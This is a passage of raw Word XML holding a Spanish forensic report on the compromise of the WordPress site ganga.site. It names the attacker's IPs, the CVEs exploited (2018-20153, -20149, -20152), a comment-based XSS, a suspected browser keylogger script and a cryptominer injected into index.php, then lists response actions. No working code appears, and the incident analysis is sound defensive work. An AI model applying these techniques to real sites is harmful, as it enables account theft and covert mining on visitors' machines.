      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El servidor web ganga.site es creado el 21 de diciembre de 2018, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instalado un</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servidor MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y un servidor Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dentro de este servidor Apache, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>el cual se ha instalado</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la </w:t>
      </w:r>
      <w:r w:rsidR="00A91EB8" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>versión</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.9.8. de WordPress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, versión de la que desde</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el 16 de diciembre de 2018 de la existencia de 8 vulnerabilidades publicadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263158A" w14:textId="152F1A88" w:rsidR="00F01FF5" w:rsidRPr="00A91EB8" w:rsidRDefault="00F01FF5" w:rsidP="00F01FF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El 30 de diciembre de 2018 a las 11:46:38 UTC, el atacante, registrado como </w:t>
      </w:r>
      <w:r w:rsidR="00A25556" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">natoly5676 </w:t>
      </w:r>
      <w:r w:rsidR="00A25556" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y con</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A25556" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>193.138.185.59</w:t>
      </w:r>
      <w:r w:rsidR="008D7AFF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A91EB8" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>localizada en</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ucrania</w:t>
      </w:r>
      <w:r w:rsidR="008D7AFF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0030615C" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trata</w:t>
      </w:r>
      <w:r w:rsidR="00A91EB8" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0030615C" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">do de explorar la vulnerabilidad </w:t>
      </w:r>
      <w:r w:rsidR="00A91EB8" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CVE (Common Vulnerabilities and Exposures): Lista de registros de información pública sobre vulnerabilidades de seguridad.</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A91EB8" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-2018-20153 consistente en que </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">realizando comentarios en el servidor web, pudiendo aprovechar una vulnerabilidad consistente en que los contribuyentes puedan modificar nuevos comentarios realizados por usuarios con mayores privilegios, posiblemente provocando XSS. Para ello, se ha aprovechado de una instancia de Amazon Web </w:t>
      </w:r>
      <w:r w:rsidRPr="008D7AFF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services: Plataforma de servicios de computación en la nube ofrecida por Amazon.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:r w:rsidR="00A91EB8" w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>18.195.165.56 para alojar el script en la web mediante un comentario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7464006E" w14:textId="16904A55" w:rsidR="00F01FF5" w:rsidRDefault="00F01FF5" w:rsidP="00F01FF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Este ataque,</w:t>
      </w:r>
      <w:r w:rsidR="00F16B40">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> técnicamente hablando, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>al servidor web es transparente</w:t>
      </w:r>
      <w:r w:rsidR="0030615C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ya que el código dañino se inyecta en el ordenador del usuario en el momento que se carga el DOM</w:t>
      </w:r>
      <w:r w:rsidR="00F16B40">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Lo que espera el presunto atacante es que el administrador o personas con capacidad administradora</w:t>
      </w:r>
      <w:r w:rsidR="00A25556">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001A4CF3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Recordemos que este servidor virtual, es un servidor que se accede desde una interfaz de línea de comandos, al cual solo se han instalado una serie de servicios, pero este carece de interfaz gráfica, Para acceder, es necesario acceder a través de </w:t>
      </w:r>
      <w:r w:rsidR="004D52A1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r w:rsidR="001A4CF3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a la consola del servidor o al apartado de administración de WordPress mediante el explorador de internet desde un ordenador distinto al servidor, el cual no tiene explorador web instalado, en este caso sería acceder a la URI ganga.site/admin si está configurada por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380B0C90" w14:textId="47B2CD1B" w:rsidR="00A25556" w:rsidRPr="00BB381F" w:rsidRDefault="00A25556" w:rsidP="00F01FF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En este caso, al notificarse al administrador por correo electrónico, las cuentas administradoras de correo tienen un acceso por web y aprovechando que en el correo electrónico llega la notificación del mensaje en HTML, con ese código dañino oculto. Puede ser que ese </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>JavaScript: Lenguaje de programación interpretado, comúnmente utilizado en desarrollo web.</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BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stat.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pueda ser que mande todo lo que se teclee o se navegue dentro del administrador, por lo que se instala, técnicamente hablando, un keylogger del explorador.</w:t>
      </w:r>
      <w:r w:rsidR="0030615C" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se desconoce este hecho ya que no se capturas del ordenador desde donde </w:t>
      </w:r>
      <w:r w:rsidR="001A4CF3" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">el administrador </w:t>
      </w:r>
      <w:r w:rsidR="0030615C" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>se ha conectado al servidor web</w:t>
      </w:r>
      <w:r w:rsidR="001A4CF3" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3E0FA5" w14:textId="31E13E8E" w:rsidR="00F01FF5" w:rsidRPr="00BB381F" w:rsidRDefault="00F01FF5" w:rsidP="00F01FF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Este ataque al parecer ha debido de ser fructífero, ya que se detectan cambios en la base de datos MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.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BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el 31 de diciembre de 2018 a las 06:25:02 UTC. Donde se observan los comentarios dentro de la configuración del index.db, permitiendo a cualquier usuario tener acceso a todos los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEB15D8" w14:textId="0E4265AD" w:rsidR="00F01FF5" w:rsidRPr="00BB381F" w:rsidRDefault="00F01FF5" w:rsidP="00F01FF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El 1 de enero de 2019 a las 07:26:05 UTC se observa una modificación del index.php de la web de ganga.site, donde se inyecta un script que hace que la persona que visite la web, empiece a minar criptomonedas con una potencia del 20%.</w:t>
      </w:r>
      <w:r w:rsidR="00C4186B" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Recordemos que ahora mismo las credenciales de administrador han sido vulneradas y estas acciones en la web, pues son un poco transparentes ya que el script se activa en el cliente donde se carga el DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1BE56" w14:textId="59E41641" w:rsidR="00F01FF5" w:rsidRPr="00BB381F" w:rsidRDefault="00F01FF5" w:rsidP="00F01FF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Posteriormente el 03 de enero de 2019 a las 07:07:28 UTC, el desde la misma IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de desde la IP de Amazon Web </w:t>
      </w:r>
      <w:r w:rsidR="00A91EB8" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services: Plataforma de servicios de computación en la nube ofrecida por Amazon.</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BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 18.195.165.56, ha tratado</w:t>
      </w:r>
      <w:r w:rsidR="00C4186B" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de aprovechar la vulnerabilidad CVE</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CVE (Common Vulnerabilities and Exposures): Lista de registros de información pública sobre vulnerabilidades de seguridad.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C4186B" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-2018-20149</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de acceder a través de del servidor Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aprovechando las vulnerabilidades </w:t>
      </w:r>
      <w:r w:rsidR="0030615C" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consistente</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en que se puede resumir en que cuando se utiliza el servidor HTTP Apache, los autores podían cargar archivos manipulados que eludían las restricciones de tipo MIME previstas, lo que lleva a XSS, como lo demuestra un archivo .jpg sin datos JPEG y, por otro lado</w:t>
      </w:r>
      <w:r w:rsidR="00C4186B" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la vulnerabilidad CVE-2018-20152 </w:t>
      </w:r>
      <w:r w:rsidR="00C4186B" w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>consistente</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en que los autores pueden evitar las restricciones previstas en los tipos de publicaciones mediante entradas diseñadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CC2D4" w14:textId="6BDC2655" w:rsidR="008D7AFF" w:rsidRPr="00BB381F" w:rsidRDefault="008D7AFF" w:rsidP="008D7AFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PROPUESTA DE LINEAS DE ACCION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FADE249" w14:textId="77777777" w:rsidR="008D7AFF" w:rsidRPr="00BB381F" w:rsidRDefault="008D7AFF" w:rsidP="0089535F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Por parte del que suscribe, se elevan las siguientes propuestas de acciones a seguir tras el presente análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE812D" w14:textId="39FEB295" w:rsidR="008D7AFF" w:rsidRPr="00BB381F" w:rsidRDefault="008D7AFF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Realizar análisis forenses en los ordenadores de las personas que tienen capacidad de administración sobre el servidor web para valorar posibles infecciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D0856" w14:textId="625D3B40" w:rsidR="004D52A1" w:rsidRPr="00BB381F" w:rsidRDefault="004D52A1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB381F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
